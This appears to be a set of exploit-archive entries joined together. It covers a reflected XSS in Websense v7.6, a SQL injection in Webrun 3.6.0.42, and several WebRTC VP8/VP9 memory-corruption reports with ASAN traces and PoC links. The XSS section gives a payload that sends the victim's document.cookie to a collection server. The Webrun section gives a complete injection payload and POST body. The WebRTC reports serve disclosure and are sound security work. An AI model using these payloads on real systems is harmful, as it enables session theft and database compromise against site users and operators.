An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue affects the following applications:
Websense Web Security Gateway Anywhere v7.6
Websense Web Security Gateway v7.6
Websense Web Security v7.6
Websense Web Filter v7.6
https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>alert(document.cookie)</script>§ion=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360
Send the current session-cookies to a credentials-collection server:
https://www.example.com/explorer_wse/detail.exe?c=cat&cat=153&anon=&startDate=2011-10-22&endDate=2011-10-22&session=a434cf98f3a402478599a71495a4a71e&dTitle=Internet_use_by_Category"><script>document.location=unescape("http://192.168.1.64/"%2bencodeURIComponent(document.cookie))</script>§ion=1&uid=&col=1&cor=1&explorer=1&fork=1&puid=7360
# Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection
# Google Dork: intitle:"Webrun 3.6.0.42"
# Date: 23/11/2021
# Exploit Author: Vinicius Alves
# Vendor Homepage: https://softwell.com.br/
# Version: 3.6.0.42
# Tested on: Kali Linux 2021.3
# CVE: CVE-2021-43650
=-=-=-= Description =-=-=-=
Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0
parameter used to set the username during the login process.
=-=-=-= Exploiting =-=-=-=
In the post request, change the P_0 value to the following payload:
121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd
You will see some information like below:
interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric:
\"qvvxq1qbzbq\"', null, null, null, '<b>
=-=-=-= POC =-=-=-=
If the return has the value 'qvvxq1qbzbq', you will be able to successfully
exploit this.
See an example of the complete POST parameter:
action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd
There is a use-after-free in VP9 processing in WebRTC. In the method RtpFrameReferenceFinder::ManageFrameVp9 the following code occurs:
auto gof_info_it = gof_info_.find((codec_header.temporal_idx == 0)
? codec_header.tl0_pic_idx - 1
: codec_header.tl0_pic_idx);
... // snip
info = &gof_info_it->second;
}
// Clean up info for base layers that are too old.
uint8_t old_tl0_pic_idx = codec_header.tl0_pic_idx - kMaxGofSaved;
auto clean_gof_info_to = gof_info_.lower_bound(old_tl0_pic_idx);
gof_info_.erase(gof_info_.begin(), clean_gof_info_to);
FrameReceivedVp9(frame->id.picture_id, info);
tl0_pic_idx is extracted from the incoming packet, and it if is higher than any picture id that exists in gof_info_, the entire vector will be erased, and info will be used in the call FrameReceivedVp9 even though it has been freed.
ASAN output:
==163231==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060000031d0 at pc 0x0000014b0e1e bp 0x7ffe607dfd30 sp 0x7ffe607dfd28
READ of size 2 at 0x6060000031d0 thread T0
#0 0x14b0e1d in webrtc::video_coding::RtpFrameReferenceFinder::FrameReceivedVp9(unsigned short, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo*) modules/video_coding/rtp_frame_reference_finder.cc:569:31
#1 0x14ac2c5 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:499:3
#2 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14
#3 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43
#4 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22
#5 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31
#6 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19
#7 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
#8 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42
#9 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20
#10 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3
#11 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35
#12 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23
#13 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5
#14 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3
#15 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#16 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#17 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36
#18 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10
#19 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31
#20 0x62337d in main video/replay.cc:343:3
#21 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
0x6060000031d0 is located 48 bytes inside of 56-byte region [0x6060000031a0,0x6060000031d8)
freed by thread T0 here:
#0 0x61bbb2 in operator delete(void*) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:150:3
#1 0x14ac26c in __libcpp_deallocate buildtools/third_party/libc++/trunk/include/new:279:10
#2 0x14ac26c in deallocate buildtools/third_party/libc++/trunk/include/memory:1802
#3 0x14ac26c in deallocate buildtools/third_party/libc++/trunk/include/memory:1556
#4 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/__tree:2370
#5 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/__tree:2379
#6 0x14ac26c in erase buildtools/third_party/libc++/trunk/include/map:1200
#7 0x14ac26c in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:497
#8 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14
#9 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43
#10 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22
#11 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31
#12 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19
#13 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
#14 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42
#15 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20
#16 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3
#17 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35
#18 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23
#19 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5
#20 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3
#21 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#22 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#23 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36
#24 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10
#25 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31
#26 0x62337d in main video/replay.cc:343:3
#27 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
previously allocated by thread T0 here:
#0 0x61af72 in operator new(unsigned long) /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_new_delete.cc:93:3
#1 0x14b664f in __libcpp_allocate buildtools/third_party/libc++/trunk/include/new:259:10
#2 0x14b664f in allocate buildtools/third_party/libc++/trunk/include/memory:1799
#3 0x14b664f in allocate buildtools/third_party/libc++/trunk/include/memory:1548
#4 0x14b664f in __construct_node<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/__tree:2191
#5 0x14b664f in std::__1::pair<std::__1::__tree_iterator<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, std::__1::__tree_node<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, void*>*, long>, bool> std::__1::__tree<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, std::__1::__map_value_compare<unsigned char, std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>, webrtc::DescendingSeqNumComp<unsigned char, (unsigned char)0>, true>, std::__1::allocator<std::__1::__value_type<unsigned char, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> > >::__emplace_unique_impl<short const&, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo>(short const&, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo&&) buildtools/third_party/libc++/trunk/include/__tree:2203
#6 0x14ab9ca in __emplace_unique<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/__tree:1193:16
#7 0x14ab9ca in emplace<const short &, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo> buildtools/third_party/libc++/trunk/include/map:1041
#8 0x14ab9ca in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrameVp9(webrtc::video_coding::RtpFrameObject*) modules/video_coding/rtp_frame_reference_finder.cc:445
#9 0x14a7849 in ManageFrameInternal modules/video_coding/rtp_frame_reference_finder.cc:89:14
#10 0x14a7849 in webrtc::video_coding::RtpFrameReferenceFinder::ManageFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) modules/video_coding/rtp_frame_reference_finder.cc:43
#11 0x148a87e in non-virtual thunk to webrtc::RtpVideoStreamReceiver::OnReceivedFrame(std::__1::unique_ptr<webrtc::video_coding::RtpFrameObject, std::__1::default_delete<webrtc::video_coding::RtpFrameObject> >) video/rtp_video_stream_receiver.cc:336:22
#12 0x1496f41 in webrtc::video_coding::PacketBuffer::InsertPacket(webrtc::VCMPacket*) modules/video_coding/packet_buffer.cc:130:31
#13 0x1487e59 in webrtc::RtpVideoStreamReceiver::OnReceivedPayloadData(unsigned char const*, unsigned long, webrtc::WebRtcRTPHeader const*) video/rtp_video_stream_receiver.cc:231:19
#14 0x12d9144 in webrtc::RTPReceiverVideo::ParseRtpPacket(webrtc::WebRtcRTPHeader*, webrtc::PayloadUnion const&, unsigned char const*, unsigned long, long) modules/rtp_rtcp/source/rtp_receiver_video.cc:109:26
#15 0x12cc80d in webrtc::RtpReceiverImpl::IncomingRtpPacket(webrtc::RTPHeader const&, unsigned char const*, unsigned long, webrtc::PayloadUnion) modules/rtp_rtcp/source/rtp_receiver_impl.cc:181:42
#16 0x1488e52 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:399:20
#17 0x1488b03 in webrtc::RtpVideoStreamReceiver::OnRecoveredPacket(unsigned char const*, unsigned long) video/rtp_video_stream_receiver.cc:245:3
#18 0x14b925c in webrtc::UlpfecReceiverImpl::ProcessReceivedFec() modules/rtp_rtcp/source/ulpfec_receiver_impl.cc:244:35
#19 0x148bd42 in webrtc::RtpVideoStreamReceiver::ParseAndHandleEncapsulatingHeader(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:421:23
#20 0x1488d51 in webrtc::RtpVideoStreamReceiver::ReceivePacket(unsigned char const*, unsigned long, webrtc::RTPHeader const&) video/rtp_video_stream_receiver.cc:390:5
#21 0x14899f8 in webrtc::RtpVideoStreamReceiver::OnRtpPacket(webrtc::RtpPacketReceived const&) video/rtp_video_stream_receiver.cc:290:3
#22 0x90c486 in webrtc::RtpDemuxer::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_demuxer.cc:157:11
#23 0x9131bd in webrtc::RtpStreamReceiverController::OnRtpPacket(webrtc::RtpPacketReceived const&) call/rtp_stream_receiver_controller.cc:55:19
#24 0x129940d in webrtc::internal::Call::DeliverRtp(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1321:36
#25 0x129a8d5 in webrtc::internal::Call::DeliverPacket(webrtc::MediaType, rtc::CopyOnWriteBuffer, webrtc::PacketTime const&) call/call.cc:1361:10
#26 0x61fe06 in webrtc::RtpReplay() video/replay.cc:279:31
#27 0x62337d in main video/replay.cc:343:3
#28 0x7f5ae03d82b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-use-after-free modules/video_coding/rtp_frame_reference_finder.cc:569:31 in webrtc::video_coding::RtpFrameReferenceFinder::FrameReceivedVp9(unsigned short, webrtc::video_coding::RtpFrameReferenceFinder::GofInfo*)
Shadow bytes around the buggy address:
0x0c0c7fff85e0: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd
0x0c0c7fff85f0: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00
0x0c0c7fff8600: fa fa fa fa 00 00 00 00 00 00 00 00 fa fa fa fa
0x0c0c7fff8610: 00 00 00 00 00 00 00 00 fa fa fa fa 00 00 00 00
0x0c0c7fff8620: 00 00 00 00 fa fa fa fa fd fd fd fd fd fd fd fa
=>0x0c0c7fff8630: fa fa fa fa fd fd fd fd fd fd[fd]fa fa fa fa fa
0x0c0c7fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff8680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==163231==ABORTING
To reproduce the issue:
1) apply new.patch to your webrtc directory
2) build video_replay
3) download the attached filed into the same directory
4) run ./video_replay --input_file uaf
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45443.zip
There is a missing check in VP9 frame processing that could lead to memory corruption.
In the file video_coding/rtp_frame_reference_finder.cc, the function RtpFrameReferenceFinder::MissingRequiredFrameVp9 contains the following code:
size_t temporal_idx = info.gof->temporal_idx[gof_idx];
...
for (size_t l = 0; l < temporal_idx; ++l) {
...
auto missing_frame_it = missing_frames_for_layer_[l].lower_bound(ref_pid);
missing_frames_for_layer_ is a std::array of length kMaxTemporalLayers which equals 5.
Meanwhile, values in the temporal_idx array are read in rtp_format_vp9.cc in the following code:
RETURN_FALSE_ON_ERROR(parser->ReadBits(&t, 3));
...
vp9->gof.temporal_idx[i] = t;
Reading three bits makes the maximum size of temporal_idx 7, which can go out of bounds of the missing_frames_for_layer_ array.
This issue causes a crash in Chrome. To reproduce the issue.
1) unzip the attached webrtc-from-chat.zip on a local webserver
2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace src/modules/rtp_rtcp/source/rtp_format_vp9.cc with the version attached to the code
3) build webrtc, including the examples
4) run the attached webrtcserver.py with python 3.6 or higher
5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to
6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome
7) Enter any username and hit "Log in"
8) Type anything into the chat window at the bottom and hit send
The attached file 'missingframe' contains the VP9 frame that causes this crash.
Though the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.
This issue affects any browser that supports VP9, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP9, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44863.zip
There is a missing check in VP9 frame processing that could lead to memory corruption.
In the file video_coding/rtp_frame_reference_finder.cc, the function RtpFrameReferenceFinder::ManageFrameVp9 fetches the GofInfo based on a pic_idx parsed from the incoming packet header. If the incoming frame is of type kVideoFrameKey, find is called on an iterator and the result is used without checking whether the it succeeds.
if (frame->frame_type() == kVideoFrameKey) {
...
GofInfo info = gof_info_.find(codec_header.tl0_pic_idx)->second;
FrameReceivedVp9(frame->id.picture_id, &info);
UnwrapPictureIds(frame);
return kHandOff;
}
This can cause a pointer to memory outside the gof_info_ map to be passed to FrameReceivedVp9. This function both reads and writes the info structure.
This issue does not crash reliably, so I recommend reproducing it using an asan build of Chrome. To reproduce the issue:
1) unzip the attached webrtc-from-chat.zip on a local webserver
2) fetch the webrtc source (https://webrtc.org/native-code/development/), and replace src/modules/rtp_rtcp/source/rtp_format_vp9.cc with the version attached to the code
3) build webrtc, including the examples
4) run the attached webrtcserver.py with python 3.6 or higher
5) start the peerconnection_client sample in the webrtc examples. Connect to the recommended server, and then select test2 as the peer to connect to
6) visit http://127.0.0.1/webrtc-from-chat/index.html in chrome
7) Enter any username and hit "Log in"
8) Type anything into the chat window at the bottom and hit send
Chrome should crash in a few seconds.
Though the attached PoC requires user interaction, it is not necessary to exercise this issue in a browser.
This issue affects any browser that supports VP9, and can be reached by loading a single webpage (though some browsers will prompt for permissions). It also affects native clients (such as mobile applications) that use webrtc and support VP9, though the user has to place or answer a video call for their client to be in the state where this issue is reachable.
I recommend fixing this by changing the above code to:
auto gof_info_it = gof_info_.find(codec_header.tl0_pic_idx);
if (gof_info_it == gof_info_.end())
return kDrop;
GofInfo info = gof_info_it->second;
FrameReceivedVp9(frame->id.picture_id, &info);
I have verified that this fix would prevent the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44862.zip
There is a use-after-free in VP8 block decoding in WebRTC. The contents of the freed block is then treated a pointer, leading to a crash in WebRTC.
==20098==ERROR: AddressSanitizer: heap-use-after-free on address 0x6330000a9491 at pc 0x0000014cde2f bp 0x7ff20616d7e0 sp 0x7ff20616d7d8
READ of size 1 at 0x6330000a9491 thread T5 (DecodingThread)
#0 0x14cde2e in vp8_deblock third_party/libvpx/source/libvpx/vp8/common/postproc.c:85:37
#1 0x14ce6b2 in vp8_post_proc_frame third_party/libvpx/source/libvpx/vp8/common/postproc.c:354:5
#2 0x14963a4 in vp8dx_get_raw_frame third_party/libvpx/source/libvpx/vp8/decoder/onyxd_if.c:404:9
#3 0x149221f in vp8_get_frame third_party/libvpx/source/libvpx/vp8/vp8_dx_iface.c:465:14
#4 0x148c118 in webrtc::LibvpxVp8Decoder::Decode(webrtc::EncodedImage const&, bool, webrtc::RTPFragmentationHeader const*, webrtc::CodecSpecificInfo const*, long) modules/video_coding/codecs/vp8/libvpx_vp8_decoder.cc:254:9
#5 0x1b930b4 in webrtc::VCMGenericDecoder::Decode(webrtc::VCMEncodedFrame const&, long) modules/video_coding/generic_decoder.cc:233:29
#6 0x1b6fad3 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const&) modules/video_coding/video_receiver.cc:374:19
#7 0x1b6ff19 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const*) modules/video_coding/video_receiver.cc:340:10
#8 0x1af33e4 in webrtc::internal::VideoReceiveStream::Decode() video/video_receive_stream.cc:433:41
#9 0x1aedc8f in webrtc::internal::VideoReceiveStream::DecodeThreadFunction(void*) video/video_receive_stream.cc:410:49
#10 0x6544d3 in Run rtc_base/platform_thread.cc:163:5
#11 0x6544d3 in rtc::PlatformThread::StartThread(void*) rtc_base/platform_thread.cc:81
#12 0x7ff22125e493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
0x6330000a9491 is located 3217 bytes inside of 96619-byte region [0x6330000a8800,0x6330000c016b)
freed by thread T5 (DecodingThread) here:
#0 0x59e3e2 in __interceptor_free /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:68:3
#1 0x1492a54 in vp8_de_alloc_frame_buffers third_party/libvpx/source/libvpx/vp8/common/alloccommon.c:41:3
#2 0x1492b0c in vp8_alloc_frame_buffers third_party/libvpx/source/libvpx/vp8/common/alloccommon.c:54:3
#3 0x149126c in vp8_decode third_party/libvpx/source/libvpx/vp8/vp8_dx_iface.c:374:13
#4 0x14d42c5 in vpx_codec_decode third_party/libvpx/source/libvpx/vpx/src/vpx_decoder.c:116:11
#5 0x148c0a1 in webrtc::LibvpxVp8Decoder::Decode(webrtc::EncodedImage const&, bool, webrtc::RTPFragmentationHeader const*, webrtc::CodecSpecificInfo const*, long) modules/video_coding/codecs/vp8/libvpx_vp8_decoder.cc:245:7
#6 0x1b930b4 in webrtc::VCMGenericDecoder::Decode(webrtc::VCMEncodedFrame const&, long) modules/video_coding/generic_decoder.cc:233:29
#7 0x1b6fad3 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const&) modules/video_coding/video_receiver.cc:374:19
#8 0x1b6ff19 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const*) modules/video_coding/video_receiver.cc:340:10
#9 0x1af33e4 in webrtc::internal::VideoReceiveStream::Decode() video/video_receive_stream.cc:433:41
#10 0x1aedc8f in webrtc::internal::VideoReceiveStream::DecodeThreadFunction(void*) video/video_receive_stream.cc:410:49
#11 0x6544d3 in Run rtc_base/platform_thread.cc:163:5
#12 0x6544d3 in rtc::PlatformThread::StartThread(void*) rtc_base/platform_thread.cc:81
#13 0x7ff22125e493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
previously allocated by thread T5 (DecodingThread) here:
#0 0x59e723 in __interceptor_malloc /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cc:88:3
#1 0x1530d92 in vpx_calloc third_party/libvpx/source/libvpx/vpx_mem/vpx_mem.c:60:10
#2 0x1492e12 in vp8_alloc_frame_buffers third_party/libvpx/source/libvpx/vp8/common/alloccommon.c:90:7
#3 0x149126c in vp8_decode third_party/libvpx/source/libvpx/vp8/vp8_dx_iface.c:374:13
#4 0x14d42c5 in vpx_codec_decode third_party/libvpx/source/libvpx/vpx/src/vpx_decoder.c:116:11
#5 0x148c0a1 in webrtc::LibvpxVp8Decoder::Decode(webrtc::EncodedImage const&, bool, webrtc::RTPFragmentationHeader const*, webrtc::CodecSpecificInfo const*, long) modules/video_coding/codecs/vp8/libvpx_vp8_decoder.cc:245:7
#6 0x1b930b4 in webrtc::VCMGenericDecoder::Decode(webrtc::VCMEncodedFrame const&, long) modules/video_coding/generic_decoder.cc:233:29
#7 0x1b6fad3 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const&) modules/video_coding/video_receiver.cc:374:19
#8 0x1b6ff19 in webrtc::vcm::VideoReceiver::Decode(webrtc::VCMEncodedFrame const*) modules/video_coding/video_receiver.cc:340:10
#9 0x1af33e4 in webrtc::internal::VideoReceiveStream::Decode() video/video_receive_stream.cc:433:41
#10 0x1aedc8f in webrtc::internal::VideoReceiveStream::DecodeThreadFunction(void*) video/video_receive_stream.cc:410:49
#11 0x6544d3 in Run rtc_base/platform_thread.cc:163:5
#12 0x6544d3 in rtc::PlatformThread::StartThread(void*) rtc_base/platform_thread.cc:81
#13 0x7ff22125e493 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x7493)
Thread T5 (DecodingThread) created by T0 here:
#0 0x5871ed in __interceptor_pthread_create /b/build/slave/linux_upload_clang/build/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors.cc:210:3
#1 0x654760 in rtc::PlatformThread::Start() rtc_base/platform_thread.cc:103:3
#2 0x1af010e in webrtc::internal::VideoReceiveStream::Start() video/video_receive_stream.cc:227:18
#3 0x5d9f4d in webrtc::RtpReplay() video/replay.cc:614:19
#4 0x5dd5fe in main video/replay.cc:700:3
#5 0x7ff21f8f92b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: heap-use-after-free third_party/libvpx/source/libvpx/vp8/common/postproc.c:85:37 in vp8_deblock
Shadow bytes around the buggy address:
0x0c668000d240: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d250: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d260: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d270: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d280: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c668000d290: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c668000d2e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
